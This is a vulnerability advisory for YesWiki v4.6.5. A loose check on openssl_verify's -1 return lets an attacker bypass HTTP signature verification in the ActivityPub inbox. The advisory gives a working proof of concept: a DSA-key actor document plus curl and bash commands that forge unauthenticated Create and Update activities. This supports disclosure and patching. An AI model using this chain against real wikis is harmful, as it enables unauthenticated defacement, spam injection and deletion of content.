PT-2026-57028 · Packagist · Yeswiki/Yeswiki
Published
2026-07-09
·
Updated
2026-07-09
·
CVE-2026-52767
CVSS v3.1
8.2
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L |
Summary
HttpSignatureService::verifySignature() checks the result of PHP's openssl verify() with a loose boolean negation - if (!openssl verify(...)) { throw ... }. PHP's openssl verify has four possible return values:| return | meaning | !return |
|---|---|---|
1 | signature is valid | false |
0 | signature is invalid | true ✓ |
-1 | the verify call itself failed (internal error) | false ❌ |
false | input rejected by PHP's argument validation | true ✓ |
The
-1 row is the bypass: PHP's truthiness rules make -1 a truthy value, so !(-1) === false, the throw is skipped, and the controller proceeds to processActivity(). Any condition that makes OpenSSL's EVP VerifyFinal() return -1 triggers the bypass.The two practical paths to
-1 we are aware of:- DSA / EC public key with an RSA-only algorithm.
openssl verify(..., $dsaKey, "RSA-SHA256")returnsint(-1)on PHP 8.3 + OpenSSL 3.x. This is the path the PoC uses; it works against an unmodifiedphp:8.3-apachelab and against any deployment using the runtime stack YesWiki's own docker image ships. - Older PHP + older OpenSSL where any unrecognised digest name returned
-1rather thanfalse. The reporting research mentions this path; on current stacksfalseis returned instead and the throw fires correctly. The DSA path replaces it.
The reachable consequence is the same in both cases - the controller silently treats a failed verification as success and processes the attacker's payload.
Details
Affected component
- File:
tools/bazar/services/HttpSignatureService.php - Method:
HttpSignatureService::verifySignature(Request $request) - Sink: line 130
php
// tools/bazar/services/HttpSignatureService.php (v4.6.5 = origin/doryphore-dev HEAD)
public function verifySignature(Request $request) {
... // [Signature parse,
// outbound key fetch — see the SSRF advisory]
$actorPublicKey = openssl get publickey($actor['publicKey']['publicKeyPem']);
...
if (!openssl verify( // (a) LOOSE BOOLEAN CHECK
join("
", $sigParts),
base64 decode($sigConf['signature']),
$actorPublicKey,
strtoupper($sigConf['algorithm'])
)) {
throw new Exception('Signature verification failed'); // (b) skipped when openssl verify == -1
}
if ($request->headers->get('Digest') !== $this->getDigest($request->getContent())) {
throw new Exception('Digest mismatch'); // (c) still enforced — easy to satisfy
}
}The inbox controller calls
verifySignature() and then runs processActivity($activity, $form), which is what actually mutates state.End-to-end attack chain
A single unauthenticated POST per operation. No session, no CSRF, no real signature.
- Stand up an actor document that the attacker controls — any public web server (or webhook receiver) that returns a JSON body with the shape:
json
{
"id": "<exact URL the server will GET>",
"publicKey": {
"id": "<same URL>",
"publicKeyPem": "<DSA public key in PEM form>"
}
}- Send a Create / Update / Delete activity to
POST /api/forms/{enabled-form-id}/actor/inbox:
http
POST /?api/forms/2/actor/inbox HTTP/1.1
Host: target.example
Content-Type: application/activity+json
Date: <RFC1123 date>
Digest: SHA-256=<base64(sha256(body))>
Signature: keyId="<actor URL>",algorithm="RSA-SHA256",headers="(request-target) host date digest content-type",signature="anVuaw=="
{"@context":"https://www.w3.org/ns/activitystreams","type":"Create",
"actor":"<actor URL>",
"object":{"id":"<unique object URI>","type":"Event","name":"...","startTime":"..."}}- YesWiki fetches the actor document (line 96 - the SSRF; see sibling advisory), parses it, calls
openssl get publickey(...)which returns a valid OpenSSL key handle (DSA is parsed successfully), then callsopenssl verify($data, "junk-sig", $dsaKey, "RSA-SHA256"). EVP VerifyFinal returns-1. The check!openssl verify(...)evaluates tofalseand the throw is skipped. Digestheader is enforced, but it's a simpleSHA-256=of the body the attacker chose, so satisfying it costs onesha256sum.processActivity($activity, $form)runs: Create →EntryManager::create(), Update →EntryManager::update(), Delete →EntryManager::delete(). The triple store records the attacker'sobject.idas the source URL, which is how Update / Delete locate the entry on subsequent calls.
PoC
Pre Reqs
- Yeswiki v4.6.5 lab image (Setup via podman)
- ActivityPub enabled on the target form
For the rest of this document:
bash
BASE="http://localhost:8085"
CTR="yeswiki-poc"
KEYID="http://127.0.0.1:9999/actors/attacker"
FORM ID=2
MARKER="DEMO $(date +%s)"PHP one-liner - runs against the exact PHP+OpenSSL the lab is using. Confirm that
openssl verify returns -1.bash
podman exec "$CTR" php -r '
$pem = file get contents("/tmp/attacker keys/dsa.pub");
$key = openssl get publickey($pem);
$r = openssl verify("hello", "junk", $key, "RSA-SHA256");
echo "openssl verify returned: " . var export($r, true) . "
";
echo "!openssl verify(...) is: " . var export(!$r, true) . "
";
'Expected output:
openssl verify returned: -1
!openssl verify(...) is: falseVerify the listener is up and serving the DSA-key actor
bash
podman exec "$CTR" cat /tmp/ssrf listener.pid
podman exec "$CTR" ps -p $(podman exec "$CTR" cat /tmp/ssrf listener.pid) -o stat=
podman exec "$CTR" curl -s http://127.0.0.1:9999/actors/attacker | head -c 300; echoExpected output: a PID,
S (sleeping/alive), and a JSON document beginning with {"@context":"https://www.w3.org/ns/activitystreams","id":"http://127.0.0.1:9999/actors/attacker", ... and a publicKeyPem field whose value starts with -----BEGIN PUBLIC KEY----- MIIB... (the DSA key - note the Bv prefix typical of DSA-key DER, not the Ij of RSA).Build a JSON Create activity that the Agenda form's reverse-semantic template can map (it expects an
Event with name, content, startTime, endTime, location.address.*, etc.):bash
ACTIVITY='{
"@context": "https://www.w3.org/ns/activitystreams",
"type": "Create",
"id": "http://127.0.0.1:9999/activity/c-'"$MARKER"'",
"actor":"'"$KEYID"'",
"object": {
"id": "http://127.0.0.1:9999/objects/'"$MARKER"'",
"type": "Event",
"name": "'"$MARKER"' — created via the signature-verification bypass",
"content": "openssl verify returned -1; YesWiki accepted us anyway",
"startTime": "2026-12-01T10:00:00Z",
"endTime": "2026-12-01T12:00:00Z"
}
}'
# Digest must equal SHA-256= base64(sha256(body)) - this header IS enforced
DIGEST="SHA-256=$(printf '%s' "$ACTIVITY" | openssl dgst -sha256 -binary | base64)"
DATE="$(date -uR | sed 's/+0000/GMT/')"
SIG='keyId="'"$KEYID"'",algorithm="RSA-SHA256",headers="(request-target) host date digest content-type",signature="anVuaw=="'
curl -s -X POST "${BASE}/?api/forms/${FORM ID}/actor/inbox"
-H "Content-Type: application/activity+json"
-H "Date: ${DATE}"
-H "Digest: ${DIGEST}"
-H "Signature: ${SIG}"
--data-raw "$ACTIVITY"
-w '
HTTP %{http code}
'Now, try udating the entry via the same bypass
The triple store records
<tag, sourceUrl, object.id> from the Create. An Update activity referencing the same object.id will look that up and rewrite the entry's body.bash
UPDATE ACT='{
"@context": "https://www.w3.org/ns/activitystreams",
"type": "Update",
"id": "http://127.0.0.1:9999/activity/u-'"$MARKER"'",
"actor":"'"$KEYID"'",
"object": {
"id": "http://127.0.0.1:9999/objects/'"$MARKER"'",
"type": "Event",
"name": "'"$MARKER"' UPDATED — title was changed by an unauthenticated POST",
"content": "this row was modified via the SAME bypass",
"startTime": "2026-12-01T10:00:00Z",
"endTime": "2026-12-01T12:00:00Z"
}
}'
DIGEST="SHA-256=$(printf '%s' "$UPDATE ACT" | openssl dgst -sha256 -binary | base64)"
DATE="$(date -uR | sed 's/+0000/GMT/')"
curl -s -X POST "${BASE}/?api/forms/${FORM ID}/actor/inbox"
-H "Content-Type: application/activity+json"
-H "Date: ${DATE}"
-H "Digest: ${DIGEST}"
-H "Signature: ${SIG}"
--data-raw "$UPDATE ACT"
-w ' HTTP %{http code}
'Expected output:
HTTP 200, empty body.Impact
CRUD on bazar entries of any ActivityPub-enabled form, without authentication:
- Create -
EntryManager::create($form['bn id nature'], $entry, false, $object['id']). New row inyeswiki pagesand a triple<tag, sourceUrl, $object['id']>inyeswiki triples. - Update - looks up the entry via the source-URL triple and rewrites its body with the attacker-supplied content.
- Delete - same lookup, then
EntryManager::delete($tag, true).
Concrete operational impact:
- Defacement / content injection at scale - a public-facing wiki with the Agenda or Blog-actu form federated becomes a publishing target for any attacker who can route TCP to the YesWiki host.
- Spam / SEO poisoning through the Bazar entry body, which is HTML-rendered for the wiki and indexed by search.
- Erasure of legitimate federated content - any entry previously created via ActivityPub can be enumerated through the public outbox endpoint, its
object.iddiscovered, and then deleted by replaying the chain withtype=Delete. - Triple-store pollution - the
yeswiki triplestable grows with attacker-controlledsourceUrltriples that survive entry deletion and can interfere with later federation flows. - Reputation / federation poisoning - the wiki appears (to remote ActivityPub peers and to its own users) to be receiving signed content from a remote actor, when in reality anyone on the network can post.
Fix
Improper Verification of Cryptographic Signature
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Yeswiki/Yeswiki